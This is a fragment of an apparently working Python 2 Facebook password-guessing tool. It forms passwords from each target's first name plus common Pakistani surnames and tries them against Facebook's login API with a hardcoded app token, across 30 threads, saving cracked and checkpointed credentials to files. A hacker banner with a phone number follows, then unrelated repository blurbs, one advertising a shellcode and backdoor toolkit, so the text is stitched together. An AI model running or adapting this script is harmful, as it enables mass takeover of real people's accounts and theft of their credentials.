cek.close() cekpoint.append(user+pass1) else: pass2 = 'Pakistan' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2 oks.append(user+pass2) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2 cek = open("out/checkpoint.txt", "a") cek.write(user+"|"+pass2+"\n") cek.close() cekpoint.append(user+pass2) else: pass3 = a['first_name'] + 'rajpoot' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3 oks.append(user+pass3) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3 cek = open("out/checkpoint.txt", "a") cek.write(user+"|"+pass3+"\n") cek.close() cekpoint.append(user+pass3) else: pass4 = b['first_name'] + 'mughal' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4 oks.append(user+pass4) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4 cek = open("out/checkpoint.txt", "a") cek.write(user+"|"+pass4+"\n") cek.close() cekpoint.append(user+pass4) else: pass5 = b['first_name'] + 'malik' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5 oks.append(user+pass5) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5 cek = open("out/checkpoint.txt", "a") cek.write(user+"|"+pass5+"\n") cek.close() cekpoint.append(user+pass5) else: pass6 = b['first_name'] + 'khan' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6 oks.append(user+pass6) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6 cek = open("out/checkpoint.txt", "a") cek.write(user+"|"+pass6+"\n") cek.close() cekpoint.append(user+pass6) else: a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket) b = json.loads(a.text) pass7 = b['first_name'] + 'afridi' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7 oks.append(user+pass7) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7 cek = open("out/checkpoint.txt", "a") cek.write(user+"|"+pass7+"\n") cek.close() cekpoint.append(user+pass7) except: pass p = ThreadPool(30) p.map(main, id) print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡" print " \033[1;93m«---•◈•---Developed By love---•◈•---»" #Dev:love_hacker print '\033[1;91mProcess Has Been Completed\033[1;92m....' print"\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint)) print """ ...........███ ]▄▄▄▄▄▃ ..▂▄▅█████▅▄▃▂ [███████████████] ◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤ ♡──────────────•◈•──────────────♡. : \033[1;96m .....dara.russ /hacker........... \033[1;93m : ♡──────────────•◈•──────────────♡.' whatsapp Num +923094161457""" raw_input("\n\033[1;92m[\033[1;94mBack\033[1;96m]") menu() if __name__ == '__main__': login()
zeroSteiner / Vulnerability DevelopmentBits of code to help with vulnerability development
mahi7000 / Developer Vulnerability ScannerNo description available
livepwn / Hahasecure"A powerful exploit development toolkit for generating shellcode, creating backdoors, injecting processes, and encoding payloads. Designed for penetration testers and red teamers."